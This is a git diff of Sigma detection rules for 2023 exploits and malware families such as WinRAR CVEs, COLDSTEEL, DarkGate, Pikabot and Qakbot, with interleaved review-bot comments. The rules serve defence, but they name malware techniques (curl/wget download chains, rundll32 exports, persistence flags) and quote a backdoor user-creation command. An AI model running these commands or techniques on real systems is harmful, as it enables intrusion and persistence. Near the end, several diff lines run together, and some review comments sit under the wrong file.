+ - 30806 # The client re-established its session to the server.
+ # - 31001 # Error (Doesn't contain the "ServerAddress" field)
filter_main_local_ips:
ServerAddress|startswith:
- - '10.'
- - 192.168.
- - 172.16.
+ - '10.' # 10.0.0.0/8
+ - 192.168. # 192.168.0.0/16
+ - 172.16. # 172.16.0.0/12
- 172.17.
- 172.18.
- 172.19.
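Review bot: `filter_main_local_ips` excludes only IPv4 prefixes, so if `ServerAddress` carries IPv6 literals, failed SMB connections to loopback, link-local or ULA peers inside the network are not filtered and raise this medium alert; the list should also carry `- '::1' # IPv6 loopback`, `- 'fe80:' # IPv6 link-local fe80::/10` and `- 'fd' # IPv6 ULA fd00::/8` (extend to fc00::/7 if that half is used). Whether SmbClient/Connectivity events emit IPv6 addresses in `ServerAddress` is inferred, not shown here, so confirm against a sample event before adding the prefixes. The same filter list continues in the next hunk, where `127.` and `169.254.` are annotated.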
@@ -42,11 +44,10 @@ detection:
- 172.29.
- 172.30.
- 172.31.
- - '127.'
- - 169.254.
+ - '127.' # 127.0.0.0/8
+ - 169.254. # 169.254.0.0/16
condition: smbclient_connectivity and (selection and not 1 of filter_main_*)
falsepositives:
- - Some false positives may occur from external trusted servers. Apply additional
- filters accordingly
+ - Some false positives may occur from external trusted servers. Apply additional filters accordingly
level: medium
ruletype: Sigma
diff --git a/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-36884/win_security_exploit_cve_2023_36884_office_windows_html_rce_share_access_pattern.yml b/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-36884/win_security_exploit_cve_2023_36884_office_windows_html_rce_share_access_pattern.yml
index 35ed905a2..5fcb96159 100644
--- a/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-36884/win_security_exploit_cve_2023_36884_office_windows_html_rce_share_access_pattern.yml
+++ b/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-36884/win_security_exploit_cve_2023_36884_office_windows_html_rce_share_access_pattern.yml
@@ -1,8 +1,7 @@
title: Potential CVE-2023-36884 Exploitation - Share Access
id: 3df95076-9e78-4e63-accb-16699c3b74f8
status: experimental
-description: Detects access to a file share with a naming schema seen being used during
- exploitation of CVE-2023-36884
+description: Detects access to a file share with a naming schema seen being used during exploitation of CVE-2023-36884
references:
- https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit
author: Nasreddine Bencherchali (Nextron Systems)
@@ -14,8 +13,7 @@ tags:
logsource:
product: windows
service: security
- definition: The advanced audit policy setting "Object Access > Audit File Share"
- must be configured for Success/Failure
+ definition: The advanced audit policy setting "Object Access > Audit File Share" must be configured for Success/Failure
detection:
security:
Channel: Security
diff --git a/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-38831/proc_creation_win_exploit_cve_2023_38831_winrar_child_proc.yml b/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-38831/proc_creation_win_exploit_cve_2023_38831_winrar_child_proc.yml
index 6340172b9..fed5935a0 100644
--- a/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-38831/proc_creation_win_exploit_cve_2023_38831_winrar_child_proc.yml
+++ b/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-38831/proc_creation_win_exploit_cve_2023_38831_winrar_child_proc.yml
@@ -1,11 +1,10 @@
title: CVE-2023-38331 Exploitation Attempt - Suspicious WinRAR Child Process
id: ec3a3c2f-9bb0-4a9b-8f4b-5ec386544343
related:
- - id: e4556676-fc5c-4e95-8c39-5ef27791541f
- type: similar
+ - id: e4556676-fc5c-4e95-8c39-5ef27791541f
+ type: similar
status: experimental
-description: Detects exploitation attempt of CVE-2023-38331 (WinRAR before v6.23),
- where an attacker can leverage WinRAR to execute arbitrary commands and binaries.
+description: Detects exploitation attempt of CVE-2023-38331 (WinRAR before v6.23), where an attacker can leverage WinRAR to execute arbitrary commands and binaries.
references:
- https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/
- https://github.com/knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831/blob/26ab6c40b6d2c09bb4fc60feaa4a3a90cfd20c23/Part-1-Overview.md
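Review bot: The reflowed `+description:` line (and the unchanged `title:`) identify the vulnerability as CVE-2023-38331, while the file name `proc_creation_win_exploit_cve_2023_38831_winrar_child_proc.yml` and both references use CVE-2023-38831; the digits look transposed, since the WinRAR pre-6.23 issue the links describe is CVE-2023-38831. Correcting to `title: CVE-2023-38831 Exploitation Attempt - Suspicious WinRAR Child Process` and `description: Detects exploitation attempt of CVE-2023-38831 (WinRAR before v6.23), where an attacker can leverage WinRAR to execute arbitrary commands and binaries.` keeps CVE-keyed searches and alert triage from missing this rule. Since the commit already touches the description line, this is the natural place to fix it.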
@@ -26,19 +25,20 @@ detection:
selection_parent:
ParentProcessName|endswith: \WinRAR.exe
selection_folder:
- CommandLine|contains: \AppData\Local\Temp\Rar$
+ CommandLine|contains: \AppData\Local\Temp\Rar$
selection_double_ext:
- CommandLine|re: \.[a-zA-Z0-9]{1,4} \.
+ CommandLine|re: \.[a-zA-Z0-9]{1,4} \.
selection_binaries:
- - NewProcessName|endswith:
- - \cmd.exe
- - \wscript.exe
- - OriginalFileName:
- - Cmd.Exe
- - cscript.exe
- - PowerShell.EXE
- - pwsh.dll
- - wscript.exe
+ # Note: add additional binaries that the attacker might use
+ - NewProcessName|endswith:
+ - \cmd.exe
+ - \wscript.exe
+ - OriginalFileName:
+ - Cmd.Exe
+ - cscript.exe
+ - PowerShell.EXE
+ - pwsh.dll
+ - wscript.exe
condition: process_creation and (all of selection_*)
falsepositives:
- Unlikely
diff --git a/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-40477/win_application_exploit_cve_2023_40477_winrar_crash.yml b/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-40477/win_application_exploit_cve_2023_40477_winrar_crash.yml
index 2f1826af3..d0076ebdc 100644
--- a/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-40477/win_application_exploit_cve_2023_40477_winrar_crash.yml
+++ b/sigma/builtin/emerging-threats/2023/Exploits/CVE-2023-40477/win_application_exploit_cve_2023_40477_winrar_crash.yml
@@ -1,8 +1,7 @@
title: CVE-2023-40477 Potential Exploitation - WinRAR Application Crash
id: e5a29b54-6fe7-4258-8a23-82960e31231a
status: experimental
-description: Detects a crash of "WinRAR.exe" where the version is lower than 6.23.
- This could indicate potential exploitation of CVE-2023-40477
+description: Detects a crash of "WinRAR.exe" where the version is lower than 6.23. This could indicate potential exploitation of CVE-2023-40477
references:
- https://wildptr.io/winrar-cve-2023-40477-poc-new-vulnerability-winrar-security-research/
- https://github.com/wildptr-io/Winrar-CVE-2023-40477-POC
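Review bot: In `selection_binaries` the `NewProcessName|endswith` branch lists only `\cmd.exe` and `\wscript.exe`, while the `OriginalFileName` branch also covers `cscript.exe`, `PowerShell.EXE` and `pwsh.dll`; as far as I know the Security 4688 event this rule is keyed on (`EventID: 4688`, `Channel: Security`) carries no `OriginalFileName` field, so on this log source the second branch never matches and cscript/powershell/pwsh children launched from a `Rar$` temp folder go undetected. Adding `- \cscript.exe`, `- \powershell.exe` and `- \pwsh.exe` under `NewProcessName|endswith` brings the two branches into agreement, which is also what the new `# Note: add additional binaries` comment asks for. The same NewProcessName/OriginalFileName split appears in the CVE-2023-22518 and DarkGate Autoit3 hunks, but there the two lists already agree, so no change is needed.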
@@ -24,6 +23,7 @@ detection:
EventID: 1000
AppName: WinRAR.exe
filter_main_fixed_version:
+ # TODO: fix this when the "lt" modifier is implemented for software versions
AppVersion|startswith:
- 6.23.
- 6.24.
diff --git a/sigma/builtin/emerging-threats/2023/Exploits/win_msmq_corrupted_packet.yml b/sigma/builtin/emerging-threats/2023/Exploits/win_msmq_corrupted_packet.yml
index a9aecc277..16ef41993 100644
--- a/sigma/builtin/emerging-threats/2023/Exploits/win_msmq_corrupted_packet.yml
+++ b/sigma/builtin/emerging-threats/2023/Exploits/win_msmq_corrupted_packet.yml
@@ -1,8 +1,7 @@
title: MSMQ Corrupted Packet Encountered
id: ae94b10d-fee9-4767-82bb-439b309d5a27
status: experimental
-description: Detects corrupted packets sent to the MSMQ service. Could potentially
- be a sign of CVE-2023-21554 exploitation
+description: Detects corrupted packets sent to the MSMQ service. Could potentially be a sign of CVE-2023-21554 exploitation
references:
- https://www.randori.com/blog/vulnerability-analysis-queuejumper-cve-2023-21554/
author: Nasreddine Bencherchali (Nextron Systems)
diff --git a/sigma/builtin/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_anonymous_process.yml b/sigma/builtin/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_anonymous_process.yml
index d2e67ad8c..e9e6fcf11 100644
--- a/sigma/builtin/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_anonymous_process.yml
+++ b/sigma/builtin/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_anonymous_process.yml
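Review bot: `filter_main_fixed_version` excludes crashes only for versions starting with `6.23.` and `6.24.`, so a crash of any later fixed release still fires this rule even though the description limits it to versions lower than 6.23; until the `lt` modifier the new TODO refers to exists, the prefix list has to grow with every WinRAR release. The TODO should say so, e.g. `# TODO: fix this when the "lt" modifier is implemented for software versions; until then append the prefix of each new fixed WinRAR release below`. If the `AppVersion|startswith` list continues past the end of this hunk with newer prefixes, the first point is moot but the comment is still worth having.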
@@ -1,8 +1,7 @@
title: COLDSTEEL RAT Anonymous User Process Execution
id: e01b6eb5-1eb4-4465-a165-85d40d874add
status: experimental
-description: Detects the creation of a process executing as user called "ANONYMOUS"
- seen used by the "MileStone2016" variant of COLDSTEEL
+description: Detects the creation of a process executing as user called "ANONYMOUS" seen used by the "MileStone2016" variant of COLDSTEEL
references:
- https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf
author: Nasreddine Bencherchali (Nextron Systems)
diff --git a/sigma/builtin/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_service_persistence.yml b/sigma/builtin/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_service_persistence.yml
index 201d5022e..b5c42591e 100644
--- a/sigma/builtin/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_service_persistence.yml
+++ b/sigma/builtin/emerging-threats/2023/Malware/COLDSTEEL/proc_creation_win_malware_coldsteel_service_persistence.yml
@@ -1,8 +1,7 @@
title: COLDSTEEL RAT Service Persistence Execution
id: 9f9cd389-cea0-4142-bf1a-a3fd424abedd
status: experimental
-description: Detects the creation of an "svchost" process with specific command line
- flags, that were seen present and used by ColdSteel RAT
+description: Detects the creation of an "svchost" process with specific command line flags, that were seen present and used by ColdSteel RAT
references:
- https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf
author: X__Junior (Nextron Systems)
@@ -19,11 +18,11 @@ detection:
EventID: 4688
Channel: Security
selection:
- CommandLine|endswith:
+ CommandLine|endswith:
- ' -k msupdate'
- ' -k msupdate2'
- ' -k alg'
- NewProcessName|endswith: \svchost.exe
+ NewProcessName|endswith: \svchost.exe
condition: process_creation and selection
falsepositives:
- Unlikely
diff --git a/sigma/builtin/emerging-threats/2023/Malware/COLDSTEEL/registry_set_malware_coldsteel_created_users.yml b/sigma/builtin/emerging-threats/2023/Malware/COLDSTEEL/registry_set_malware_coldsteel_created_users.yml
index 3d9d4a9cf..621561baf 100644
--- a/sigma/builtin/emerging-threats/2023/Malware/COLDSTEEL/registry_set_malware_coldsteel_created_users.yml
+++ b/sigma/builtin/emerging-threats/2023/Malware/COLDSTEEL/registry_set_malware_coldsteel_created_users.yml
@@ -1,8 +1,7 @@
title: Potential COLDSTEEL RAT Windows User Creation
id: 95214813-4c7a-4a50-921b-ee5c538e1d16
status: experimental
-description: Detects creation of a new user profile with a specific username, seen
- being used by some variants of the COLDSTEEL RAT.
+description: Detects creation of a new user profile with a specific username, seen being used by some variants of the COLDSTEEL RAT.
references:
- https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf
author: Nasreddine Bencherchali (Nextron Systems)
diff --git a/sigma/builtin/emerging-threats/2023/Malware/COLDSTEEL/win_system_malware_coldsteel_persistence_service.yml b/sigma/builtin/emerging-threats/2023/Malware/COLDSTEEL/win_system_malware_coldsteel_persistence_service.yml
index 68b8ab5c6..a1e270191 100644
--- a/sigma/builtin/emerging-threats/2023/Malware/COLDSTEEL/win_system_malware_coldsteel_persistence_service.yml
+++ b/sigma/builtin/emerging-threats/2023/Malware/COLDSTEEL/win_system_malware_coldsteel_persistence_service.yml
@@ -1,8 +1,7 @@
title: COLDSTEEL Persistence Service Creation
id: 3ced239c-7285-4b54-99c4-8525b69293f7
status: test
-description: Detects the creation of new services potentially related to COLDSTEEL
- RAT
+description: Detects the creation of new services potentially related to COLDSTEEL RAT
references:
- https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf
author: Nasreddine Bencherchali (Nextron Systems)
diff --git a/sigma/builtin/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_autoit3_from_susp_parent_and_location.yml b/sigma/builtin/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_autoit3_from_susp_parent_and_location.yml
index d575aab94..befa6a640 100644
--- a/sigma/builtin/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_autoit3_from_susp_parent_and_location.yml
+++ b/sigma/builtin/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_autoit3_from_susp_parent_and_location.yml
@@ -1,15 +1,10 @@
title: DarkGate - Autoit3.EXE Execution Parameters
id: f8e9aa1c-14f2-4dbd-aa59-b98968ed650d
status: experimental
-description: 'Detects execution of the legitimate Autoit3 utility from a suspicious
- parent process. AutoIt3.exe is used within
-
- the DarkGate infection chain to execute shellcode that performs process injection
- and connects to the DarkGate
-
+description: |
+ Detects execution of the legitimate Autoit3 utility from a suspicious parent process. AutoIt3.exe is used within
+ the DarkGate infection chain to execute shellcode that performs process injection and connects to the DarkGate
command-and-control server.
-
- '
references:
- https://github.security.telekom.com/2023/08/darkgate-loader.html
- https://www.kroll.com/en/insights/publications/cyber/microsoft-teams-used-as-initial-access-for-darkgate-malware
@@ -28,15 +23,15 @@ detection:
EventID: 4688
Channel: Security
selection_proc:
- - NewProcessName|endswith: \Autoit3.exe
- - OriginalFileName: AutoIt3.exe
+ - NewProcessName|endswith: \Autoit3.exe
+ - OriginalFileName: AutoIt3.exe
selection_parent:
ParentProcessName|endswith:
- \cmd.exe
- \KeyScramblerLogon.exe
- \msiexec.exe
filter_main_legit_autoit_location:
- NewProcessName|endswith:
+ NewProcessName|endswith:
- :\Program Files (x86)\AutoIt3\AutoIt3.exe
- :\Program Files\AutoIt3\AutoIt3.exe
condition: process_creation and (all of selection_* and not 1 of filter_main_*)
diff --git a/sigma/builtin/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_net_user_creation.yml b/sigma/builtin/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_net_user_creation.yml
index e205aed86..5cc0bceca 100644
--- a/sigma/builtin/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_net_user_creation.yml
+++ b/sigma/builtin/emerging-threats/2023/Malware/DarkGate/proc_creation_win_malware_darkgate_net_user_creation.yml
@@ -1,8 +1,7 @@
title: DarkGate - User Created Via Net.EXE
id: bf906d7b-7070-4642-8383-e404cf26eba5
status: experimental
-description: Detects creation of local users via the net.exe command with the name
- of "DarkGate"
+description: Detects creation of local users via the net.exe command with the name of "DarkGate"
references:
- Internal Research
author: X__Junior (Nextron Systems)
@@ -16,16 +15,17 @@ logsource:
category: process_creation
product: windows
detection:
+ # /c net user /add SafeMode DarkGate0!
process_creation:
EventID: 4688
Channel: Security
selection:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- user
- add
- DarkGate
- SafeMode
- NewProcessName|endswith:
+ NewProcessName|endswith:
- \net.exe
- \net1.exe
condition: process_creation and selection
diff --git a/sigma/builtin/emerging-threats/2023/Malware/Griffon/proc_creation_win_malware_griffon_patterns.yml b/sigma/builtin/emerging-threats/2023/Malware/Griffon/proc_creation_win_malware_griffon_patterns.yml
index 9d8ee4472..309d7c208 100644
--- a/sigma/builtin/emerging-threats/2023/Malware/Griffon/proc_creation_win_malware_griffon_patterns.yml
+++ b/sigma/builtin/emerging-threats/2023/Malware/Griffon/proc_creation_win_malware_griffon_patterns.yml
@@ -1,8 +1,7 @@
title: Griffon Malware Attack Pattern
id: bcc6f179-11cd-4111-a9a6-0fab68515cf7
status: experimental
-description: Detects process execution patterns related to Griffon malware as reported
- by Kaspersky
+description: Detects process execution patterns related to Griffon malware as reported by Kaspersky
references:
- https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/
author: Nasreddine Bencherchali (Nextron Systems)
@@ -18,7 +17,7 @@ detection:
EventID: 4688
Channel: Security
selection:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- \local\temp\
- //b /e:jscript
- .txt
diff --git a/sigma/builtin/emerging-threats/2023/Malware/IcedID/proc_creation_win_malware_icedid_rundll32_dllregisterserver.yml b/sigma/builtin/emerging-threats/2023/Malware/IcedID/proc_creation_win_malware_icedid_rundll32_dllregisterserver.yml
index 910bd1b94..b787c5815 100644
--- a/sigma/builtin/emerging-threats/2023/Malware/IcedID/proc_creation_win_malware_icedid_rundll32_dllregisterserver.yml
+++ b/sigma/builtin/emerging-threats/2023/Malware/IcedID/proc_creation_win_malware_icedid_rundll32_dllregisterserver.yml
@@ -1,9 +1,7 @@
title: IcedID Malware Suspicious Single Digit DLL Execution Via Rundll32
id: 2bd8e100-5b3b-4b6a-bbb5-b129d3ddddc5
status: experimental
-description: Detects RunDLL32.exe executing a single digit DLL named "1.dll" with
- the export function "DllRegisterServer". This behaviour was often seen used by
- malware and especially IcedID
+description: Detects RunDLL32.exe executing a single digit DLL named "1.dll" with the export function "DllRegisterServer". This behaviour was often seen used by malware and especially IcedID
references:
- https://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/
- https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/
@@ -21,10 +19,10 @@ detection:
EventID: 4688
Channel: Security
selection:
- CommandLine|endswith:
- - \1.dll, DllRegisterServer
- - ' 1.dll, DllRegisterServer'
- NewProcessName|endswith: \rundll32.exe
+ CommandLine|endswith:
+ - \1.dll, DllRegisterServer # In case of full path exec
+ - ' 1.dll, DllRegisterServer' # In case of direct exec
+ NewProcessName|endswith: \rundll32.exe
condition: process_creation and selection
falsepositives:
- Unknown
diff --git a/sigma/builtin/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_combined_commands_execution.yml b/sigma/builtin/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_combined_commands_execution.yml
index d7302dc56..eb0b05b05 100644
--- a/sigma/builtin/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_combined_commands_execution.yml
+++ b/sigma/builtin/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_combined_commands_execution.yml
@@ -1,18 +1,10 @@
title: Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE
id: e5144106-8198-4f6e-bfc2-0a551cc8dd94
status: experimental
-description: 'Detects the execution of concatenated commands via "cmd.exe". Pikabot
- often executes a combination of multiple commands via the command handler "cmd
- /c" in order to download and execute additional payloads.
-
- Commands such as "curl", "wget" in order to download extra payloads. "ping" and
- "timeout" are abused to introduce delays in the command execution and "Rundll32"
- is also used to execute malicious DLL files.
-
- In the observed Pikabot infections, a combination of the commands described above
- are used to orchestrate the download and execution of malicious DLL files.
-
- '
+description: |
+ Detects the execution of concatenated commands via "cmd.exe". Pikabot often executes a combination of multiple commands via the command handler "cmd /c" in order to download and execute additional payloads.
+ Commands such as "curl", "wget" in order to download extra payloads. "ping" and "timeout" are abused to introduce delays in the command execution and "Rundll32" is also used to execute malicious DLL files.
+ In the observed Pikabot infections, a combination of the commands described above are used to orchestrate the download and execution of malicious DLL files.
references:
- https://github.com/pr0xylife/Pikabot/blob/7f7723a74ca325ec54c6e61e076acce9a4b20538/Pikabot_30.10.2023.txt
- https://github.com/pr0xylife/Pikabot/blob/7f7723a74ca325ec54c6e61e076acce9a4b20538/Pikabot_22.12.2023.txt
@@ -32,21 +24,21 @@ detection:
EventID: 4688
Channel: Security
selection_cmd:
- CommandLine|contains|all:
+ CommandLine|contains|all:
- cmd
- /c
selection_pipes:
- CommandLine|contains:
+ CommandLine|contains:
- ' & '
- ' || '
selection_commands_1:
- CommandLine|contains:
+ CommandLine|contains:
- ' curl'
- ' wget'
- ' timeout '
- ' ping '
selection_commands_2:
- CommandLine|contains:
+ CommandLine|contains:
- ' rundll32'
- ' mkdir '
condition: process_creation and (all of selection_*)
diff --git a/sigma/builtin/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_discovery.yml b/sigma/builtin/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_discovery.yml
index a2d762771..ef3cd6a8a 100644
--- a/sigma/builtin/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_discovery.yml
+++ b/sigma/builtin/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_discovery.yml
@@ -1,13 +1,9 @@
title: Potential Pikabot Discovery Activity - Suspicious Process Created By Rundll32.EXE
id: 698d4431-514f-4c82-af4d-cf573872a9f5
status: experimental
-description: 'Detects the execution of rundll32 that leads to system discovery activity,
- such as incl. network, user info and domain groups.
-
- The malware Pikabot has been seen to use this technique as part of its C2-botnet
- registration with a short collection time frame (less than 1 minute).
-
- '
+description: |
+ Detects the execution of rundll32 that leads to system discovery activity, such as incl. network, user info and domain groups.
+ The malware Pikabot has been seen to use this technique as part of its C2-botnet registration with a short collection time frame (less than 1 minute).
references:
- https://www.virustotal.com/gui/file/72f1a5476a845ea02344c9b7edecfe399f64b52409229edaf856fcb9535e3242
author: Andreas Braathen (mnemonic.io)
@@ -21,16 +17,15 @@ tags:
logsource:
product: windows
category: process_creation
- definition: 'Requirements: By default the process_creation type event might not
- contain the GrandParentImage. Make sure you collect such fields in order to
- use this rule'
+ definition: 'Requirements: By default the process_creation type event might not contain the GrandParentImage. Make sure you collect such fields in order to use this rule'
detection:
process_creation:
EventID: 4688
Channel: Security
selection:
GrandParentImage|endswith: \rundll32.exe
- CommandLine:
+ CommandLine:
+ # Note: Only add strings as seen used by Pikabot to avoid collision with other strains of malware
- ipconfig.exe /all
- netstat.exe -aon
- whoami.exe /all
diff --git a/sigma/builtin/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_hollowing.yml b/sigma/builtin/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_hollowing.yml
index 0ea95dcd8..61cb4db93 100644
--- a/sigma/builtin/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_hollowing.yml
+++ b/sigma/builtin/emerging-threats/2023/Malware/Pikabot/proc_creation_win_malware_pikabot_rundll32_hollowing.yml
@@ -1,13 +1,9 @@ title: Potential Pikabot Hollowing Activity - Suspicious Process Created By Rundll32.EXE id: d8937fe7-42d5-4b4d-8178-e089c908f63f status: experimental -description: 'Detects the execution of rundll32 that leads to the invocation of legitimate - Windows binaries. - - The malware Pikabot has been seen to use this technique for process hollowing - through hard-coded Windows binaries - - ' +description: | + Detects the execution of rundll32 that leads to the invocation of legitimate Windows binaries. + The malware Pikabot has been seen to use this technique for process hollowing through hard-coded Windows binaries references: - https://www.virustotal.com/gui/file/b6e8910fb9b3bb1fcddefd35ff0ed8624930d30d6977e11808c8330415685a62 author: Andreas Braathen (mnemonic.io) @@ -25,14 +21,15 @@ detection: Channel: Security selection: ParentProcessName|endswith: \rundll32.exe - NewProcessName|endswith: + NewProcessName|endswith: + # Note: Only add processes seen used by Pikabot to avoid collision with other strains of malware - \searchprotocolhost.exe - \sndvol.exe - \wermgr.exe - \wwahost.exe filter_main_legit_sndvol: ParentCommandLine|contains: mmsys.cpl - NewProcessName|endswith: \sndvol.exe + NewProcessName|endswith: \sndvol.exe condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unlikely diff --git a/sigma/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_regsvr32_calc_pattern.yml b/sigma/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_regsvr32_calc_pattern.yml index 4e50489cb..b4e75b47d 100644 --- a/sigma/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_regsvr32_calc_pattern.yml +++ b/sigma/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_regsvr32_calc_pattern.yml 
@@ -1,9 +1,7 @@ title: Qakbot Regsvr32 Calc Pattern id: 0033cf83-fb87-446d-9cac-43d63ad4d5a9 status: experimental -description: Detects a specific command line of "regsvr32" where the "calc" keyword - is used in conjunction with the "/s" flag. This behavior is often seen used by - Qakbot +description: Detects a specific command line of "regsvr32" where the "calc" keyword is used in conjunction with the "/s" flag. This behavior is often seen used by Qakbot references: - https://github.com/pr0xylife/Qakbot/ author: Nasreddine Bencherchali (Nextron Systems) @@ -20,11 +18,11 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - ' /s' - ' -s' - CommandLine|endswith: ' calc' - NewProcessName|endswith: \regsvr32.exe + CommandLine|endswith: ' calc' + NewProcessName|endswith: \regsvr32.exe condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_execution.yml b/sigma/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_execution.yml index 4777ee469..13805359e 100644 --- a/sigma/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_execution.yml +++ b/sigma/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_execution.yml @@ -1,8 +1,7 @@ title: Potential Qakbot Rundll32 Execution id: cf879ffb-793a-4753-9a14-bc8f37cc90df status: experimental -description: Detects specific process tree behavior of a "rundll32" execution often - linked with potential Qakbot activity. +description: Detects specific process tree behavior of a "rundll32" execution often linked with potential Qakbot activity. references: - https://github.com/pr0xylife/Qakbot/ author: X__Junior (Nextron Systems) 
@@ -19,12 +18,14 @@ detection: EventID: 4688 Channel: Security selection_paths: - CommandLine|contains: + CommandLine|contains: + # Note: Only add paths seen used by Qakbot to avoid collision with other strains of malware - :\ProgramData\ - :\Users\Public\ - \AppData\Local\Temp\ - \AppData\Roaming\ ParentProcessName|endswith: + # Note: Only add processes seen used by Qakbot to avoid collision with other strains of malware - \cmd.exe - \cscript.exe - \curl.exe @@ -32,9 +33,9 @@ detection: - \powershell.exe - \pwsh.exe - \wscript.exe - NewProcessName|endswith: \rundll32.exe + NewProcessName|endswith: \rundll32.exe selection_extension: - CommandLine|contains: .dll + CommandLine|contains: .dll condition: process_creation and (all of selection_*) falsepositives: - Unlikely diff --git a/sigma/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_exports.yml b/sigma/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_exports.yml index 3d44919ff..d72dabfc0 100644 --- a/sigma/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_exports.yml +++ b/sigma/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_exports.yml @@ -1,8 +1,7 @@ title: Qakbot Rundll32 Exports Execution id: 339ed3d6-5490-46d0-96a7-8abe33078f58 status: experimental -description: Detects specific process tree behavior of a "rundll32" execution with - exports linked with Qakbot activity. +description: Detects specific process tree behavior of a "rundll32" execution with exports linked with Qakbot activity. references: - https://github.com/pr0xylife/Qakbot/ author: X__Junior (Nextron Systems) 
@@ -20,12 +19,14 @@ detection: EventID: 4688 Channel: Security selection_paths: - CommandLine|contains: + CommandLine|contains: + # Note: Only add paths seen used by Qakbot to avoid collision with other strains of malware - :\ProgramData\ - :\Users\Public\ - \AppData\Local\Temp\ - \AppData\Roaming\ ParentProcessName|endswith: + # Note: Only add processes seen used by Qakbot to avoid collision with other strains of malware - \cmd.exe - \cscript.exe - \curl.exe @@ -33,10 +34,11 @@ detection: - \powershell.exe - \pwsh.exe - \wscript.exe - NewProcessName|endswith: \rundll32.exe + NewProcessName|endswith: \rundll32.exe selection_exports: - CommandLine|endswith: - - aslr + CommandLine|endswith: + # Note: Only add additional exports seen used by Qakbot + - aslr # https://tria.ge/230524-scgq9add9v/behavioral1#report - bind - DrawThemeIcon - GG10 @@ -46,7 +48,7 @@ detection: - LS88 - Motd - N115 - - next + - next # https://tria.ge/230530-n3rxpahf9w/behavioral2 - Nikn - print - qqqb diff --git a/sigma/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_fake_dll_execution.yml b/sigma/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_fake_dll_execution.yml index eac11a69c..854e6d612 100644 --- a/sigma/builtin/emerging-threats/2023/Malware/Qakbot/proc_creation_win_malware_qakbot_rundll32_fake_dll_execution.yml +++ 